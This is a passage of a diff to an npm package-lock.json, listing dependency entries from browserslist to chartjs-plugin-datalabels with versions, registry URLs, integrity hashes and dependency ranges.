"sha512-Rmb62sR1Zpjql25eSanFGEhAxcFwfA1K0GuQcLoaJBAcENegrQut3hYdhXFF1obQfiDyqIW/cLM5HSJ/9k884A==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "caniuse-lite": "^1.0.30001663", + "electron-to-chromium": "^1.5.28", + "node-releases": "^2.0.18", + "update-browserslist-db": "^1.1.0" + }, + "bin": { + "browserslist": "cli.js" + }, + "engines": { + "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + } + }, + "node_modules/bson": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/bson/-/bson-6.10.1.tgz", + "integrity": "sha512-P92xmHDQjSKPLHqFxefqMxASNq/aWJMEZugpCjf+AF/pgcUpMMQCg7t7+ewko0/u8AapvF3luf/FoehddEK+sA==", + "license": "Apache-2.0", + "engines": { + "node": ">=16.20.1" + } + }, + "node_modules/btoa": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/btoa/-/btoa-1.2.1.tgz", + "integrity": "sha512-SB4/MIGlsiVkMcHmT+pSmIPoNDoHg+7cMzmt3Uxt628MTz2487DKSqK/fuhFBrkuqrYv5UCEnACpF4dTFNKc/g==", + "bin": { + "btoa": "bin/btoa.js" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/buffer": { + "version": "4.9.2", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-4.9.2.tgz", + "integrity": "sha512-xq+q3SRMOxGivLhBNaUdC64hDTQwejJ+H0T/NB1XMtTVEwNTrfFF3gAxiyW0Bu/xWEGhjVKgUcMhCrUy2+uCWg==", + "dependencies": { + "base64-js": "^1.0.2", + "ieee754": "^1.1.4", + "isarray": "^1.0.0" + } + }, + "node_modules/buffer-crc32": { + "version": "0.2.13", + "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": "sha1-DTM+PwDqxQqhRUq9MO+MKl2ackI=", + "engines": { + "node": "*" + } + }, + "node_modules/buffer-equal-constant-time": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz", + "integrity": "sha1-+OcRMvf/5uAaXJaXpMbz5I1cyBk=" + }, + "node_modules/buffer-from": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", + "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==" + }, + "node_modules/buffer-writer": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/buffer-writer/-/buffer-writer-2.0.0.tgz", + "integrity": "sha512-a7ZpuTZU1TRtnwyCNW3I5dc0wWNC3VR9S++Ewyk2HHZdrO3CQJqSpd+95Us590V6AL7JqUAH2IwZ/398PmNFgw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/buffer/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/bufrw": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/bufrw/-/bufrw-1.3.0.tgz", + "integrity": "sha512-jzQnSbdJqhIltU9O5KUiTtljP9ccw2u5ix59McQy4pV2xGhVLhRZIndY8GIrgh5HjXa6+QJ9AQhOd2QWQizJFQ==", + "dependencies": { + "ansi-color": "^0.2.1", + "error": "^7.0.0", + "hexer": "^1.5.0", + "xtend": "^4.0.0" + }, + "engines": { + "node": ">= 0.10.x" + } + }, + "node_modules/buildcheck": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/buildcheck/-/buildcheck-0.0.6.tgz", + "integrity": "sha512-8f9ZJCUXyT1M35Jx7MkBgmBMo3oHTTBIPLiY9xyL0pl3T5RwcPEY8cUHr5LBNfu/fk6c2T4DJZuVM/8ZZT2D2A==", + "optional": true, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/builtin-modules": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/builtin-modules/-/builtin-modules-3.3.0.tgz", + "integrity": "sha512-zhaCDicdLuWN5UbN5IMnFqNMhNfo919sH85y2/ea+5Yg9TsTkeZxpL+JLbp6cgYFS4sRLp3YV4S6yDuqVWHYOw==", + "dev": true, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/builtins": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/builtins/-/builtins-4.1.0.tgz", + "integrity": "sha512-1bPRZQtmKaO6h7qV1YHXNtr6nCK28k0Zo95KM4dXfILcZZwoHJBN1m3lfLv9LPkcOZlrSr+J1bzMaZFO98Yq0w==", + "dev": true, + "peer": true, + "dependencies": { + "semver": "^7.0.0" + } + }, + "node_modules/builtins/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "peer": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/builtins/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "peer": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/builtins/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true, + "peer": true + }, + "node_modules/bull": { + "version": "3.29.3", + "resolved": "https://registry.npmjs.org/bull/-/bull-3.29.3.tgz", + "integrity": "sha512-MOqV1dKLy1YQgP9m3lFolyMxaU+1+o4afzYYf0H4wNM+x/S0I1QPQfkgGlLiH00EyFrvSmeubeCYFP47rTfpjg==", + "dependencies": { + "cron-parser": "^2.13.0", + "debuglog": "^1.0.0", + "get-port": "^5.1.1", + "ioredis": "^4.27.0", + "lodash": "^4.17.21", + "p-timeout": "^3.2.0", + "promise.prototype.finally": "^3.1.2", + "semver": "^7.3.2", + "util.promisify": "^1.0.1", + "uuid": "^8.3.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/bull/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/bull/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/bull/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/bull/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/bundle-name": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bundle-name/-/bundle-name-4.1.0.tgz", + "integrity": "sha512-tjwM5exMg6BGRI+kNmTntNsvdZS1X8BFYS6tnJ2hdH0kVxM6/eVZ2xy+FqStSWvYmtfFMDLIxurorHwDKfDz5Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "run-applescript": "^7.0.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/bunyan": { + "version": "1.8.15", + "resolved": "https://registry.npmjs.org/bunyan/-/bunyan-1.8.15.tgz", + "integrity": "sha512-0tECWShh6wUysgucJcBAoYegf3JJoZWibxdqhTm7OHPeT42qdjkZ29QCMcKwbgU1kiH+auSIasNRXMLWXafXig==", + "engines": [ + "node >=0.10.0" + ], + "bin": { + "bunyan": "bin/bunyan" + }, + "optionalDependencies": { + "dtrace-provider": "~0.8", + "moment": "^2.19.3", + "mv": "~2", + "safe-json-stringify": "~1" + } + }, + "node_modules/busboy": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz", + "integrity": "sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==", + "dependencies": { + "streamsearch": "^1.1.0" + }, + "engines": { + "node": ">=10.16.0" + } + }, + "node_modules/bytes": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", + "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/c8": { + "version": "7.14.0", + "resolved": "https://registry.npmjs.org/c8/-/c8-7.14.0.tgz", + "integrity": "sha512-i04rtkkcNcCf7zsQcSv/T9EbUn4RXQ6mropeMcjFOsQXQ0iGLAr/xT6TImQg4+U9hmNpN9XdvPkjUL1IzbgxJw==", + "dev": true, + "dependencies": { + "@bcoe/v8-coverage": "^0.2.3", + "@istanbuljs/schema": "^0.1.3", + "find-up": "^5.0.0", + "foreground-child": "^2.0.0", + "istanbul-lib-coverage": "^3.2.0", + "istanbul-lib-report": "^3.0.0", + "istanbul-reports": "^3.1.4", + "rimraf": "^3.0.2", + "test-exclude": "^6.0.0", + "v8-to-istanbul": "^9.0.0", + "yargs": "^16.2.0", + "yargs-parser": "^20.2.9" + }, + "bin": { + "c8": "bin/c8.js" + }, + "engines": { + "node": ">=10.12.0" + } + }, + "node_modules/c8/node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dev": true, + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/c8/node_modules/yargs": { + "version": "16.2.0", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-16.2.0.tgz", + "integrity": "sha512-D1mvvtDG0L5ft/jGWkLpG1+m0eQxOfaBvTNELraWj22wSVUMWxZUvYgJYcKh6jGGIkJFhH4IZPQhR4TKpc8mBw==", + "dev": true, + "dependencies": { + "cliui": "^7.0.2", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.0", + "y18n": "^5.0.5", + "yargs-parser": "^20.2.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/c8/node_modules/yargs-parser": { + "version": "20.2.9", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-20.2.9.tgz", + "integrity": "sha512-y11nGElTIV+CT3Zv9t7VKl+Q3hTQoT9a1Qzezhhl6Rp21gJ/IVTW7Z3y9EWXhuUBC2Shnf+DX0antecpAwSP8w==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/cache-base": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/cache-base/-/cache-base-1.0.1.tgz", + "integrity": "sha512-AKcdTnFSWATd5/GCPRxr2ChwIJ85CeyrEyjRHlKxQ56d4XJMGym0uAiKn0xbLOGOl3+yRpOTi484dVCEc5AUzQ==", + "dev": true, + "dependencies": { + "collection-visit": "^1.0.0", + "component-emitter": "^1.2.1", + "get-value": "^2.0.6", + "has-value": "^1.0.0", + "isobject": "^3.0.1", + "set-value": "^2.0.0", + "to-object-path": "^0.3.0", + "union-value": "^1.0.0", + "unset-value": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/cache-flow": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/cache-flow/-/cache-flow-1.9.0.tgz", + "integrity": "sha512-oGRBf4bCZbzyKAbZrfSqtfv9+rrDCtSiHihjjc1okmmvIYT0WqPHNq/yh/sDAUBT46RkpxZ4FqaGVrLBagnzgQ==", + "dependencies": { + "cluster": "^0.7.7", + "date-fns": "^2.23.0", + "ioredis": "^4.27.6", + "lru-cache-for-clusters-as-promised": "^1.7.1", + "object-hash": "^2.2.0" + } + }, + "node_modules/cachedir": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/cachedir/-/cachedir-2.3.0.tgz", + "integrity": "sha512-A+Fezp4zxnit6FanDmv9EqXNAi3vt9DWp51/71UEhXukb7QUuvtv9344h91dyAxuTLoSYJFU299qzR3tzwPAhw==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/call-bind": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.7.tgz", + "integrity": "sha512-GHTSNSYICQ7scH7sZ+M2rFopRoLh8t2bLSW6BbgrtLsahOIB5iyAVJf9GjWK3cYTDaMj4XdBpM1cA6pIS0Kv2w==", + "dependencies": { + "es-define-property": "^1.0.0", + "es-errors": "^1.3.0", + "function-bind": "^1.1.2", + "get-intrinsic": "^1.2.4", + "set-function-length": "^1.2.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/call-me-maybe": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-me-maybe/-/call-me-maybe-1.0.2.tgz", + "integrity": "sha512-HpX65o1Hnr9HH25ojC1YGs7HCQLq0GCOibSaWER0eNpgJ/Z1MZv2mTc7+xh6WOPxbRVcmgbv4hGU+uSQ/2xFZQ==" + }, + "node_modules/callsites": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/camel-case": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/camel-case/-/camel-case-4.1.2.tgz", + "integrity": "sha512-gxGWBrTT1JuMx6R+o5PTXMmUnhnVzLQ9SNutD4YqKtI6ap897t3tKECYla6gCWEkplXnlNybEkZg9GEGxKFCgw==", + "dev": true, + "dependencies": { + "pascal-case": "^3.1.2", + "tslib": "^2.0.3" + } + }, + "node_modules/camelcase": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", + "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/camelcase-keys": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/camelcase-keys/-/camelcase-keys-4.2.0.tgz", + "integrity": "sha1-oqpfsa9oh1glnDLBQUJteJI7m3c=", + "dependencies": { + "camelcase": "^4.1.0", + "map-obj": "^2.0.0", + "quick-lru": "^1.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/camelcase-keys/node_modules/camelcase": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-4.1.0.tgz", + "integrity": "sha1-1UVjW+HjPFQmScaRc+Xeas+uNN0=", + "engines": { + "node": ">=4" + } + }, + "node_modules/camelize": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/camelize/-/camelize-1.0.0.tgz", + "integrity": "sha1-FkpUg+Yw+kMh5a8HAg5TGDGyYJs=" + }, + "node_modules/caniuse-api": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/caniuse-api/-/caniuse-api-3.0.0.tgz", + "integrity": "sha512-bsTwuIg/BZZK/vreVTYYbSWoe2F+71P7K5QGEX+pT250DZbfU1MQ5prOKpPR+LL6uWKK3KMwMCAS74QB3Um1uw==", + "dev": true, + "dependencies": { + "browserslist": "^4.0.0", + "caniuse-lite": "^1.0.0", + "lodash.memoize": "^4.1.2", + "lodash.uniq": "^4.5.0" + } + }, + "node_modules/caniuse-lite": { + "version": "1.0.30001667", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001667.tgz", + "integrity": "sha512-7LTwJjcRkzKFmtqGsibMeuXmvFDfZq/nzIjnmgCGzKKRVzjD72selLDK1oPF/Oxzmt4fNcPvTDvGqSDG4tCALw==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/caniuse-lite" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ] + }, + "node_modules/canvas": { + "version": "2.11.2", + "resolved": "https://registry.npmjs.org/canvas/-/canvas-2.11.2.tgz", + "integrity": "sha512-ItanGBMrmRV7Py2Z+Xhs7cT+FNt5K0vPL4p9EZ/UX/Mu7hFbkxSjKF2KVtPwX7UYWp7dRKnrTvReflgrItJbdw==", + "dev": true, + "hasInstallScript": true, + "optional": true, + "peer": true, + "dependencies": { + "@mapbox/node-pre-gyp": "^1.0.0", + "nan": "^2.17.0", + "simple-get": "^3.0.3" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/case-sensitive-paths-webpack-plugin": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/case-sensitive-paths-webpack-plugin/-/case-sensitive-paths-webpack-plugin-2.4.0.tgz", + "integrity": "sha512-roIFONhcxog0JSSWbvVAh3OocukmSgpqOH6YpMkCvav/ySIV3JKg4Dc8vYtQjYi/UxpNE36r/9v+VqTQqgkYmw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=4" + } + }, + "node_modules/caseless": { + "version": "0.12.0", + "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", + "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" + }, + "node_modules/catharsis": { + "version": "0.9.0", + "resolved": "https://registry.npmjs.org/catharsis/-/catharsis-0.9.0.tgz", + "integrity": "sha512-prMTQVpcns/tzFgFVkVp6ak6RykZyWb3gu8ckUpd6YkTlacOd3DXGJjIpD4Q6zJirizvaiAjSSHlOsA+6sNh2A==", + "dependencies": { + "lodash": "^4.17.15" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/celebrate": { + "version": "15.0.3", + "resolved": "https://registry.npmjs.org/celebrate/-/celebrate-15.0.3.tgz", + "integrity": "sha512-ToF8ILq/F0KhQ0CPtexP7Cu9GkqKJ91VKy3ZOCV24aaNWdm3QCHqnXAKfKHrtcM2B2zmPFe11p8WWsQkmq8k4g==", + "dependencies": { + "escape-html": "1.0.3", + "joi": "17.x.x", + "lodash": "4.17.x" + } + }, + "node_modules/chai": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/chai/-/chai-4.3.6.tgz", + "integrity": "sha512-bbcp3YfHCUzMOvKqsztczerVgBKSsEijCySNlHHbX3VG1nskvqjz5Rfso1gGwD6w6oOV3eI60pKuMOV5MV7p3Q==", + "dev": true, + "dependencies": { + "assertion-error": "^1.1.0", + "check-error": "^1.0.2", + "deep-eql": "^3.0.1", + "get-func-name": "^2.0.0", + "loupe": "^2.3.1", + "pathval": "^1.1.1", + "type-detect": "^4.0.5" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/chai-as-promised": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/chai-as-promised/-/chai-as-promised-7.1.1.tgz", + "integrity": "sha512-azL6xMoi+uxu6z4rhWQ1jbdUhOMhis2PvscD/xjLqNMkv3BPPp2JyyuTHOrf9BOosGpNQ11v6BKv/g57RXbiaA==", + "dev": true, + "dependencies": { + "check-error": "^1.0.2" + }, + "peerDependencies": { + "chai": ">= 2.1.2 < 5" + } + }, + "node_modules/chai-exclude": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/chai-exclude/-/chai-exclude-2.1.0.tgz", + "integrity": "sha512-IBnm50Mvl3O1YhPpTgbU8MK0Gw7NHcb18WT2TxGdPKOMtdtZVKLHmQwdvOF7mTlHVQStbXuZKFwkevFtbHjpVg==", + "dev": true, + "dependencies": { + "fclone": "^1.0.11" + }, + "peerDependencies": { + "chai": ">= 4.0.0 < 5" + } + }, + "node_modules/chai-http": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/chai-http/-/chai-http-4.4.0.tgz", + "integrity": "sha512-uswN3rZpawlRaa5NiDUHcDZ3v2dw5QgLyAwnQ2tnVNuP7CwIsOFuYJ0xR1WiR7ymD4roBnJIzOUep7w9jQMFJA==", + "dev": true, + "dependencies": { + "@types/chai": "4", + "@types/superagent": "4.1.13", + "charset": "^1.0.1", + "cookiejar": "^2.1.4", + "is-ip": "^2.0.0", + "methods": "^1.1.2", + "qs": "^6.11.2", + "superagent": "^8.0.9" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/chai-http/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/chai-http/node_modules/formidable": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/formidable/-/formidable-2.1.2.tgz", + "integrity": "sha512-CM3GuJ57US06mlpQ47YcunuUZ9jpm8Vx+P2CGt2j7HpgkKZO/DJYQ0Bobim8G6PFQmK5lOqOOdUXboU+h73A4g==", + "dev": true, + "dependencies": { + "dezalgo": "^1.0.4", + "hexoid": "^1.0.0", + "once": "^1.4.0", + "qs": "^6.11.0" + }, + "funding": { + "url": "https://ko-fi.com/tunnckoCore/commissions" + } + }, + "node_modules/chai-http/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/chai-http/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/chai-http/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/chai-http/node_modules/superagent": { + "version": "8.1.2", + "resolved": "https://registry.npmjs.org/superagent/-/superagent-8.1.2.tgz", + "integrity": "sha512-6WTxW1EB6yCxV5VFOIPQruWGHqc3yI7hEmZK6h+pyk69Lk/Ut7rLUY6W/ONF2MjBuGjvmMiIpsrVJ2vjrHlslA==", + "dev": true, + "dependencies": { + "component-emitter": "^1.3.0", + "cookiejar": "^2.1.4", + "debug": "^4.3.4", + "fast-safe-stringify": "^2.1.1", + "form-data": "^4.0.0", + "formidable": "^2.1.2", + "methods": "^1.1.2", + "mime": "2.6.0", + "qs": "^6.11.0", + "semver": "^7.3.8" + }, + "engines": { + "node": ">=6.4.0 <13 || >=14" + } + }, + "node_modules/chai-http/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/chalk": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", + "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^3.2.1", + "escape-string-regexp": "^1.0.5", + "supports-color": "^5.3.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/chalk/node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", + "dev": true, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/chalk/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/chalk/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dev": true, + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/character-entities": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/character-entities/-/character-entities-2.0.2.tgz", + "integrity": "sha512-shx7oQ0Awen/BRIdkjkvz54PnEEI/EjwXDSIZp86/KKdbafHh1Df/RYGBhn4hbe2+uKC9FnT5UCEdyPz3ai9hQ==", + "dev": true, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/character-parser": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/character-parser/-/character-parser-2.2.0.tgz", + "integrity": "sha1-x84o821LzZdE5f/CxfzeHHMmH8A=", + "dependencies": { + "is-regex": "^1.0.3" + } + }, + "node_modules/charset": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/charset/-/charset-1.0.1.tgz", + "integrity": "sha512-6dVyOOYjpfFcL1Y4qChrAoQLRHvj2ziyhcm0QJlhOcAhykL/k1kTUPbeo+87MNRTRdk2OIIsIXbuF3x2wi5EXg==", + "dev": true, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/chart.js": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/chart.js/-/chart.js-4.0.1.tgz", + "integrity": "sha512-5/8/9eBivwBZK81mKvmIwTb2Pmw4D/5h1RK9fBWZLLZ8mCJ+kfYNmV9rMrGoa5Hgy2/wVDBMLSUDudul2/9ihA==", + "dev": true, + "engines": { + "pnpm": "^7.0.0" + } + }, + "node_modules/chartjs-adapter-moment": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/chartjs-adapter-moment/-/chartjs-adapter-moment-1.0.1.tgz", + "integrity": "sha512-Uz+nTX/GxocuqXpGylxK19YG4R3OSVf8326D+HwSTsNw1LgzyIGRo+Qujwro1wy6X+soNSnfj5t2vZ+r6EaDmA==", + "dev": true, + "peerDependencies": { + "chart.js": ">=3.0.0", + "moment": "^2.10.2" + } + }, + "node_modules/chartjs-plugin-datalabels": { + "version": "2.2.0", + "resolved": 